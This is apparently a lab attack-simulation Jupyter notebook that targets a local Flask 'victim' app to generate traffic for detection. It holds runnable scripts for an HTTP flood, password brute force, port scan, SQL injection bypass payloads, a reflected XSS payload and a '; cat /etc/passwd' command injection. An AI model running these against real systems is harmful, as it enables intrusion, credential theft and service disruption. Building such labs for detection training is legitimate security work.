# Attacker Simulation Notebook (Real Network Mode)

This notebook acts as the **Attacker Machine**.
It sends **REAL** network traffic to the Victim Machine running the Flask App.

**Setup:**
1. Ensure the Flask App is running on the Victim Machine (`python app.py`).
2. Set `VICTIM_IP` below to the IP address of the Victim Machine.
   - If running locally, use `127.0.0.1`.
   - If running on a separate VM, use its LAN IP (e.g., `192.168.x.x`).

In [ ]:
import requests
import socket
import time
import random
from datetime import datetime

# CONFIGURATION
VICTIM_IP = '127.0.0.1'  # CHANGE THIS to the Victim's IP
VICTIM_PORT = 5000
BASE_URL = f'http://{VICTIM_IP}:{VICTIM_PORT}'

print(f"Targeting Victim at: {BASE_URL}")

## 1. DoS Attack Simulation
Floods the target web server with HTTP GET requests.

In [ ]:
def launch_dos_attack(count=100):
    print(f"[DoS] Flooding {BASE_URL} with {count} requests...")
    
    for i in range(count):
        try:
            # Send a real HTTP Request
            requests.get(BASE_URL, timeout=0.1)
            if i % 10 == 0:
                print(f"Sent {i} requests...")
        except Exception as e:
            pass
            
    print("[DoS] Attack Completed.")

# Run Attempt
launch_dos_attack(count=50)

## 2. Brute Force Simulation
Attempts to login to the `/portal/login` endpoint with a dictionary of passwords.

In [ ]:
def launch_brute_force():
    url = f"{BASE_URL}/portal/login"
    print(f"[Brute Force] Attacking {url}...")
    
    usernames = ['admin', 'root', 'user']
    passwords = ['123456', 'password', 'qwerty', 'admin123']
    
    for user in usernames:
        for pwd in passwords:
            # Note: Using 'data' for Form POST, not json
            payload = {'username': user, 'password': pwd}
            try:
                requests.post(url, data=payload, timeout=1)
                print(f"Tried {user}:{pwd}")
            except Exception as e:
                print(f"Error: {e}")
            time.sleep(0.1)

    print("[Brute Force] Attack Completed.")

# Run Attempt
launch_brute_force()

## 3. Network Reconnaissance (Port Scan)
Scans ports and sends a 'Fingerprint' probe to Port 5000.

In [ ]:
def launch_port_scan():
    print(f"[Port Scan] Scanning {VICTIM_IP}...")
    
    ports = [21, 22, 80, 443, 8080, 5000]
    
    for port in ports:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(0.5)
            result = sock.connect_ex((VICTIM_IP, port))
            sock.close()
            
            if result == 0:
                print(f"[+] Port {port} is OPEN")
                # If it's our target port, send a probe with a scanner signature
                if port == 5000:
                    print("    -> Sending Service Probe (User-Agent: CyberSim-Scanner)...")
                    try:
                        requests.get(f"{BASE_URL}/portal/login", headers={'User-Agent': 'CyberSim-Scanner'}, timeout=1)
                    except: pass
            else:
                print(f"[-] Port {port} is CLOSED")
        except:
            pass
        
    print("[Port Scan] Completed.")

# Run Attempt
launch_port_scan()

## 4. SQL Injection (SQLi) Attack
Attempts to bypass authentication at `/portal/login`.

In [ ]:
def launch_sqli_attack():
    url = f"{BASE_URL}/portal/login"
    print(f"[SQLi] Attacking {url}...")
    
    # Standard Authentication Bypass Payloads
    payloads = [
        "admin' OR 1=1 --",
        "admin' #",
        "' OR '1'='1"
    ]
    
    for p in payloads:
        data = {'username': p, 'password': 'randompassword'}
        try:
            # POST request
            requests.post(url, data=data, timeout=1)
            print(f"Sent payload: {p}")
        except Exception as e:
            print(f"Error: {e}")
            
    print("[SQLi] Attack Completed.")

launch_sqli_attack()

## 5. Cross-Site Scripting (XSS) Attack
Injects scripts into `/portal/search`.

In [ ]:
def launch_xss_attack():
    url = f"{BASE_URL}/portal/search"
    print(f"[XSS] Attacking {url}...")
    
    payload = "<script>alert('You have been hacked')</script>"
    
    try:
        requests.get(url, params={'q': payload}, timeout=1)
        print(f"Sent XSS payload: {payload}")
    except Exception as e:
        print(f"Error: {e}")
            
    print("[XSS] Attack Completed.")

launch_xss_attack()

## 6. Command Injection Attack
Attempts execution via the Search endpoint (Reflected RCE).

In [ ]:
def launch_command_injection_attack():
    url = f"{BASE_URL}/portal/search"
    print(f"[CI] Attacking {url}...")
    
    payload = "; cat /etc/passwd"
    
    try:
        requests.get(url, params={'q': payload}, timeout=1)
        print(f"Sent CI payload: {payload}")
    except Exception as e:
        print(f"Error: {e}")
            
    print("[CI] Attack Completed.")

launch_command_injection_attack()